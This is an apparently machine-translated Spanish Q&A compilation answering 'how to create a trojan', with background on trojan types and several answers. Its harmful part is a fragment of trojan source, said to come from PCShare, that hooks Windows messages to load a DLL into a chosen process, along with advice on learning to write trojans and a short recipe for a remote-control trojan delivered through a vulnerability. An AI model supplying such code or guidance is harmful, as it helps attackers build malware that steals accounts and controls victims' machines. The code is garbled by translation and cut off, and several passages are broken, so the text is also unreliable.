¿Cómo crear un troyano?
Pregunta 1: ¿Cómo crear un programa troyano? Necesita aprender a programar para escribir troyanos. Es mejor usar vc ++ para escribir troyanos. enet/eschool/video/c++/ Este es un tutorial de C++. Después de comprender estas cosas superficiales, puede profundizar en la programación del kernel. Si no puede abrir la dirección anterior, puede ir aquí pconline/pcedu/empolder/gj/vc. /0607/ 820674
Pregunta 2: ¿Cómo se crean los troyanos y los virus? Jaja... Tanto los troyanos como los virus son programas de ejecución...
El nombre Trojan proviene de la antigua leyenda griega (la historia del truco troyano en el poema épico de Homero El significado original de la palabra Trojan). es Trojan, que se refiere al caballo de Troya, es decir, la historia del truco del caballo de Troya).
El programa "caballo de Troya" es actualmente un archivo de virus popular. A diferencia de los virus comunes, no se reproduce y no infecta "deliberadamente" otros archivos. Atrae a los usuarios disfrazándose de troyano. , proporcionando al propietario del troyano un portal para abrir la computadora de la víctima, lo que le permite al troyano destruir y robar los archivos de la víctima a voluntad, e incluso controlar de forma remota la computadora de la víctima. El "caballo de Troya" es algo similar al software de control remoto que se usa a menudo en las redes informáticas, pero debido a que el software de control remoto es un control "bien intencionado", generalmente no se puede ocultar. El objetivo del caballo de Troya es que "un mando a distancia "robador" no tiene valor si no tiene un fuerte ocultamiento".
Se refiere a controlar otro ordenador mediante un programa específico (programa troyano). Los caballos de Troya suelen tener dos programas ejecutables: uno es el cliente, es decir, el extremo de control, y el otro es el servidor, es decir, el extremo controlado. Lo que se implanta en la computadora de la víctima es la parte del "servidor", y el llamado "hacker" usa el "controlador" para ingresar a la computadora que ejecuta el "servidor". Después de ejecutar el "servidor" del programa troyano, se abrirán uno o varios puertos en la computadora de la víctima, lo que permitirá a los piratas informáticos utilizar estos puertos abiertos para ingresar al sistema informático, ¡y la seguridad y la privacidad personal no estarán garantizadas en absoluto! Para evitar que el troyano sea descubierto, los diseñadores del troyano utilizan varios medios para ocultarlo. Una vez que el servicio troyano se esté ejecutando y conectado al extremo de control, el extremo de control disfrutará de la mayoría de los derechos de operación del servidor, como agregar contraseñas a la computadora, navegar, mover, copiar, eliminar archivos, modificar el registro, cambiar de computadora. configuraciones, etc
Con el desarrollo de la tecnología de escritura de virus, los programas troyanos se están volviendo cada vez más amenazantes para los usuarios. En particular, algunos programas troyanos utilizan medios extremadamente astutos para ocultarse, lo que dificulta que los usuarios comunes los detecten. después de haber sido envenenado.
Tipos de troyanos
1. Troyanos de juegos en línea
Con la popularidad y el auge de los juegos en línea, mi país tiene una gran cantidad de jugadores de juegos en línea. Los límites entre la riqueza virtual, como el dinero y los equipos de los juegos en línea, y la riqueza real son cada vez más borrosos. Al mismo tiempo, también se desarrollaron y se generalizaron virus troyanos cuyo objetivo era robar contraseñas de cuentas de juegos en línea.
Los troyanos de juegos en línea suelen utilizar métodos como registrar la entrada del teclado del usuario y conectar funciones API del proceso del juego para obtener contraseñas y cuentas de usuario. La información robada generalmente se envía al autor del troyano mediante un correo electrónico o enviándolo a un programa de script remoto.
Los tipos y cantidades de troyanos de juegos en línea no tienen rival entre los virus troyanos domésticos. Todos los juegos populares en línea no son inmunes a la amenaza de los troyanos de juegos en línea. Después del lanzamiento oficial de un nuevo juego, normalmente se produce el correspondiente programa troyano en una o dos semanas. La venta pública de una gran cantidad de generadores de caballos de Troya y sitios web de piratas informáticos es también una de las razones de la proliferación de caballos de Troya en los juegos en línea.
2. Troyano de banca en línea
El troyano de banca en línea es un virus troyano escrito para sistemas de transacciones en línea. Su propósito es robar números de tarjetas, contraseñas e incluso certificados de seguridad de los usuarios. Aunque el número de tipos de estos troyanos es menor que el de los troyanos para juegos no online, su daño es más directo y las pérdidas para los usuarios víctimas son más graves.
Los troyanos bancarios en línea suelen ser un objetivo muy específico. El autor del troyano puede primero realizar un análisis cuidadoso del sistema de transacciones en línea de un banco y luego escribir programas de virus para atacar las debilidades de seguridad.
Por ejemplo, el virus "Robo a la banca en línea" de 2004, cuando un usuario ingresa a la página de inicio de sesión de la banca en línea de ICBC, cambiará automáticamente la página a una versión anterior con un rendimiento de seguridad deficiente pero que aún funciona, y luego registrará el número de tarjeta y el número completado. ingresada por el usuario en esta página; "Online Banking Thief 3" utiliza la función de certificado de seguridad de respaldo de China Merchants Bank Online Banking Professional Edition para robar certificados de seguridad. "New Online Banking Thief" en 2005 usa API Hook y otras tecnologías para interferir con el funcionamiento de los controles de seguridad de inicio de sesión de la banca en línea.
Con la popularidad de las transacciones en línea en mi país, también está aumentando el número de usuarios amenazados por troyanos bancarios en línea extranjeros.
3. Troyano de software de mensajería instantánea
Hoy en día, el software de mensajería instantánea nacional está en pleno apogeo. QQ, Sina UC, NetEase Paopao, Shanda Quanquan... la base de usuarios del chat en línea es muy grande. Generalmente existen tres tipos de troyanos comunes de mensajería instantánea:
1. Envío de mensajes.
Los mensajes que contienen URL maliciosas se envían automáticamente a través del software de mensajería instantánea para permitir a los usuarios que reciben los mensajes... >>
Pregunta 3: ¿Cómo hacer un troyano simple? Un código fuente de troyano simple Programa fuente de troyano en vc++6.0, que incluye el código de cliente de cliente y servidor PCSshare:
#include stdafx.h
#include SshWork
#pragma data_seg(Compartido)
char m_CharFileName[256] = {0};
HHOOK g_hook = NULL
HHOOK g_khook = NULL;
INITDLLINFO m_InitInfo = {0};
BOOL m_IsOk = FALSE
#pragma data_seg()
#pragma ment; (enlazador,/sección:Compartido,rws)
HINSTANCE ghInstance = NULL
SshWork m_Work
BOOL APIENTRY DllMain( HANDLE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
cambiar (ul_reason_for_call)
{
caso DLL_THREAD_ATTACH:
caso DLL_THREAD_DETACH:
caso DLL_PROCESS_DETACH:
ruptura
caso DLL_PROCESS_ATTACH:
ghInstance = (HINSTANCE) hModule;
break;
default: break
}
return TRUE;
}
LRESULT WINAPI GetMsgProc(int nCode, WPARAM wParam, LPARAM lParam)
{
LRESULT lResult = CallNextHookEx(g_hook) , nCode, wParam, lParam);
Compruebe si es el proceso especificado
if(!m_IsOk && m_InitInfo.m_ProcessId == GetCurrentProcessId())
{
Encuentra el proceso especificado y cancela el gancho
m_IsOk = TRUE
if(g_hook) UnhookWindowsHookEx(g_hook); Notificar al host la salida del proceso
HANDLE m_WaitEvent =
OpenEvent(EVENT_ALL_ACCESS,FALSE,
m_InitInfo.m_EventName
if(m_WaitEvent); ) <
/p>
{
SetEvent(m_WaitEvent);
CloseHandle(m_WaitEvent
}
Dormir(1000)
Cargar DLL en el proceso
m_Work.m_Module = LoadLibrary(m_InitInfo.m_StartFile
if(m_Work.m_Module)
{
m_Work.StartWork(&m_InitInfo);
}
}
devuelve lResultado
}
BOOL PlayWork(LPINIT......>>
Pregunta 4: Cómo crear un virus troyano. Aprendalo en línea primero. No se infecte usted mismo primero. El código se puede descargar de Internet.
Pregunta 5: Cómo crear un virus troyano 5 puntos Esta es una pregunta relativamente compleja. El desarrollo de virus es diferente del desarrollo de aplicaciones ordinarias y requiere una compilación más amplia y profunda del sistema técnico. Problemas subyacentes: captura de pantalla, Hook Problemas de red con mouse y teclado: que involucran la interceptación de paquetes de datos, cifrado y descifrado de datos, problemas anti-detección: procesos ocultos... Se necesitan de 2 a 3 meses para aprender a programar y utilizar software como Delphi, generalmente puedes desarrollar aplicaciones comunes usando VC++ como máximo. Puedes crear algo en 6 meses, pero debes aprender sobre virus y troyanos durante 3 años antes de pensar en ello.
Pregunta 6: Cómo hacerlo. ¿Crear un troyano?
Robar propiedad es ilegal
Generalmente, el envenenamiento por caballos de Troya se realiza descargando software y navegando por páginas web desconocidas
El significado original de la palabra Trojan es un caballo de Troya. Trojan se refiere a un caballo de Troya, que es la historia de la estrategia del caballo de Troya.
El caballo de Troya robará su número de cuenta, información y otros datos.
Si la computadora está infectada. por caballo de Troya, se recomienda eliminar el virus lo antes posible para evitar causar problemas en el sistema
Primero puedes hacer un antivirus completo
Luego apunta a:
Tencent Computer Manager--Toolbox--Trojan Star (para virus que aparecen nuevamente después de eliminarlos) Virus rebeldes)
Finalmente active la protección antivirus en tiempo real
Pregunta 7: Cómo crear un programa troyano sencillo Hola
1. Crear troyanos y utilizar virus troyanos es un acto ilegal y criminal, y no le recomendamos que lo aprenda.
2. Después de crear un programa de virus troyano, este programa comenzará a ejecutarse automáticamente y primero robará los troyanos de la cuenta y destruirá los programas de su computadora.
3. Por lo tanto, si eres atacado o te roban tu cuenta, no utilices este método y resuélvelo por medios legítimos.
4. Se recomienda descargar un administrador de computadora desde el sitio web oficial de Tencent Computer Manager.
5. Computer Manager tiene 16 capas de funciones de protección en tiempo real y un sistema de defensa panorámica de cuenta QQ, que puede proteger la seguridad informática de los virus troyanos en todos los aspectos, desde la seguridad de Internet, la entrada de aplicaciones, la capa inferior del sistema, etc., y Computer Manager también puede proteger la seguridad de la cuenta en todos los aspectos y dimensiones, combatir con precisión los troyanos que roban cuentas, eliminar instantáneamente y advertir sobre riesgos.
Si tiene otras preguntas o problemas, puede visitar Computer Manager Enterprise Platform para hacer preguntas nuevamente. Haremos todo lo posible para responder sus preguntas.
Pregunta 8: ¿Cómo hacer un troyano de control remoto? Configure un nombre de dominio dinámico, luego configure el cliente, envíelo a través de la vulnerabilidad y realice el control remoto. Le sugiero que vea el tutorial de animación La vieja paloma gris, estúdielo primero y lo sabrá todo. >